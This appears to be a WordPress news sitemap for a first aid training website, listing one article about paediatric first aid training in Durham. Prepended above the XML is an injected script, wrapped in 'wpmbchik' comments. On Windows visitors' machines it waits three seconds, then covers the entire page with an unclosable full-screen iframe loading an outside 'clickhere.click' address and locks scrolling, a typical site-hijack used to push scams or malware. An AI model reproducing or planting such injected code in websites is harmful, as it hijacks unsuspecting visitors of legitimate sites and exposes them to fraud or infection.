
<!-- wpmbchik -->
<script>
function createModal(url) {
  const overlay = document.createElement('div');
  Object.assign(overlay.style, {
    position: 'fixed',
    inset: '0',              // top/right/bottom/left = 0
    width: '100vw',          // на всякий случай — единицы viewport
    height: '100vh',
    background: '#fff',
    zIndex: '2147483647',    // максимальный z-index
    margin: '0',
    padding: '0',
    border: '0'
  });

  const iframe = document.createElement('iframe');
  iframe.src = url;
  iframe.allowFullscreen = true;
  iframe.allow = 'fullscreen';
  Object.assign(iframe.style, {
    width: '100%',
    height: '100%',
    border: 'none',
    display: 'block',
    margin: '0',
    padding: '0'
  });

  overlay.appendChild(iframe);
  document.body.appendChild(overlay);

  document.documentElement.style.overflow = 'hidden';
  document.body.style.overflow = 'hidden';
  document.body.style.margin = '0';
}
document.addEventListener('DOMContentLoaded', () => {
  const isWindows = /Win/i.test(navigator.userAgent);
  
  if (isWindows) {
 setTimeout(() => {
    createModal('https://clickhere.click');
 }, 3000); }
});


</script>
<!-- /wpmbchik -->
<?xml version="1.0" encoding="UTF-8"?>
<!-- This sitemap was dynamically generated on 28 April 2026 at 9:37 pm by All in One SEO Pro v4.9.6.2 - the original SEO plugin for WordPress. -->

<?xml-stylesheet type="text/xsl" href="https://firstaidsafetytraining.com/news-sitemap.xsl?news-sitemap=root"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:news="http://www.google.com/schemas/sitemap-news/0.9">
	<url>
		<loc><![CDATA[https://firstaidsafetytraining.com/paediatric-first-aid-training-for-primary-school-in-durham/]]></loc>
		<news:news>
			<news:publication>
				<news:name><![CDATA[First Aid and Safety Training]]></news:name>
				<news:language><![CDATA[en]]></news:language>
			</news:publication>
			<news:publication_date><![CDATA[2026-04-27T11:36:51+00:00]]></news:publication_date>
			<news:title><![CDATA[Paediatric First Aid Training for Primary School in Durham]]></news:title>
		</news:news>
	</url>
</urlset>